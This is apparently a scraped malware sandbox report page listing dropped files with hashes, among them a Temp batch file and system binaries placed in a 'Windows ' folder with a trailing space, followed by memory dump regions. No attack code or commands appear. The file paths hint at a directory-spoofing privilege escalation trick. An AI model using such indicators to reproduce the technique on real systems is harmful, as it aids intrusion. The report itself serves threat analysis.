C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
2KB

MD5
6cf293cb4d80be23433eecf74ddb5503

SHA1
24fe4752df102c2ef492954d6b046cb5512ad408

SHA256
b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8

SHA512
0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
81b640502b0c25ab216c6b6ad82ba7bd

SHA1
1b43e1fead8428aee3b764bcacc3795021277be9

SHA256
4cf92d978f2a1fc5b80eda8a11f181603018d270fc8fe24daa634b954c75380f

SHA512
842cfba04ddbd5336e16dbc1ab8e57a80541f0ab1da6260fcca53f7f441e4b1c4149bce2d74b23684a338a86aded2626008f33edb246871e178bda1272c8fa57

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
f3b2f7c8e9b3057a4342efce5cb1f648

SHA1
cbcab1b48cd397259c504d2c915c5c30ea877b06

SHA256
2c3dc036ac8d51e14510a0a6bba650d29e55c394b3b564a5f762c2fc1ebc3693

SHA512
f627a062084919835cdfadcaa06849d6a636e4b2f6a24317c29e78183c02b4e2ffa9cf0911f627efc2143514695a1b3e70141866f61c722039721182cd5fb142

Download Submit
C:\Users\Admin\AppData\Local\Temp\SC.cmd
Filesize
399KB

MD5
472de93de365167459958b7ce29f610e

SHA1
7a7ace619fbd8569c2982fb1fc44aa4b6040f351

SHA256
5baff04fad6153b7debb8003997edf677cd677263af4ab9e95510e225401ccde

SHA512
03fc1017200c386cbe36050f5014c644edd57864ba1f7b88e5ab497d616ba3ec658ee8d690efde5544fe3befe569f3365e4d64f3b276245967193527e3b17f6a

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vmwnxiws.z2n.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Windows \System32\ComputerDefaults.exe
Filesize
80KB

MD5
d25a9e160e3b74ef2242023726f15416

SHA1
27a9bb9d7628d442f9b5cf47711c906e3315755b

SHA256
7b0334c329e40a542681bcaff610ae58ada8b1f77ff6477734c1b8b9a951ef4c

SHA512
bafaee786c90c96a2f76d4bbcddbbf397a1afd82d55999081727900f3c2de8d2eba6b77d25c622de0c1e91c54259116bc37bc9f29471d1b387f78aaa4d276910

Download Submit
C:\Windows \System32\MLANG.dll
Filesize
122KB

MD5
e286ada1af4b08fa4b7c78f862883c4e

SHA1
798ebc7b7cd3db667f1a59ade299be4cff397f39

SHA256
16eb71b68025711fdbc93229fde22ecc73dc8a23be8b40700772b96978187ea3

SHA512
fbbbc893388a39e94d8b2265aef75dbaf5fd928fadabd3dbfc5cbee64b600de0102b82e5d2b5c56efe128b45f6ddd4bba2668194c05decdfa78c8e7e382de3f5

Download Submit
memory/732-96-0x00000204BF730000-0x00000204BF744000-memory.dmp

Filesize
80KB

Download
memory/732-40-0x00007FF8A3230000-0x00007FF8A32EE000-memory.dmp

Filesize
760KB

Download
memory/732-39-0x00007FF8A4390000-0x00007FF8A4585000-memory.dmp

Filesize
2.0MB

Download
memory/736-139-0x00007FF864410000-0x00007FF864420000-memory.dmp

Filesize
64KB

Download
memory/784-137-0x00007FF864410000-0x00007FF864420000-memory.dmp

Filesize
64KB

Download
memory/1132-130-0x00007FF864410000-0x00007FF864420000-memory.dmp

Filesize
64KB

Download
memory/1332-129-0x00007FF864410000-0x00007FF864420000-memory.dmp

Filesize
64KB

Download
memory/1716-131-0x00007FF864410000-0x00007FF864420000-memory.dmp

Filesize
64KB

Download
memory/1832-133-0x00007FF864410000-0x00007FF864420000-memory.dmp

Filesize
64KB

Download
memory/1880-132-0x00007FF864410000-0x00007FF864420000-memory.dmp

Filesize
64KB

Download
memory/2000-138-0x00007FF864410000-0x00007FF864420000-memory.dmp

Filesize
64KB

Download
memory/2396-134-0x00007FF864410000-0x00007FF864420000-memory.dmp

Filesize
64KB

Download
memory/2404-135-0x00007FF864410000-0x00007FF864420000-memory.dmp

Filesize
64KB

Download
memory/3180-136-0x00007FF864410000-0x00007FF864420000-memory.dmp

Filesize
64KB

Download
memory/3424-128-0x00007FF864410000-0x00007FF864420000-memory.dmp

Filesize
64KB

Download
memory/3424-79-0x0000000002AE0000-0x0000000002B0A000-memory.dmp

Filesize
168KB

Download
memory/3984-16-0x00007FF8A4390000-0x00007FF8A4585000-memory.dmp

Filesize
2.0MB

Download
memory/3984-0-0x00007FF885C43000-0x00007FF885C45000-memory.dmp

Filesize
8KB

Download
memory/3984-17-0x00007FF8A3230000-0x00007FF8A32EE000-memory.dmp

Filesize
760KB

Download
memory/3984-15-0x0000029C37460000-0x0000029C37470000-memory.dmp

Filesize
64KB

Download
memory/3984-14-0x0000029C37770000-0x0000029C377E6000-memory.dmp

Filesize
472KB

Download
memory/3984-13-0x0000029C37490000-0x0000029C374D4000-memory.dmp

Filesize
272KB

Download
memory/3984-12-0x00007FF885C40000-0x00007FF886701000-memory.dmp

Filesize
10.8MB

Download
memory/3984-11-0x00007FF885C40000-0x00007FF886701000-memory.dmp

Filesize
10.8MB

Download
memory/3984-18-0x0000029C376F0000-0x0000029C3773C000-memory.dmp

Filesize
304KB

Download
memory/3984-10-0x0000029C372D0000-0x0000029C372F2000-memory.dmp

Filesize
136KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v13

Replay Monitor

Loading Replay Monitor...

Downloads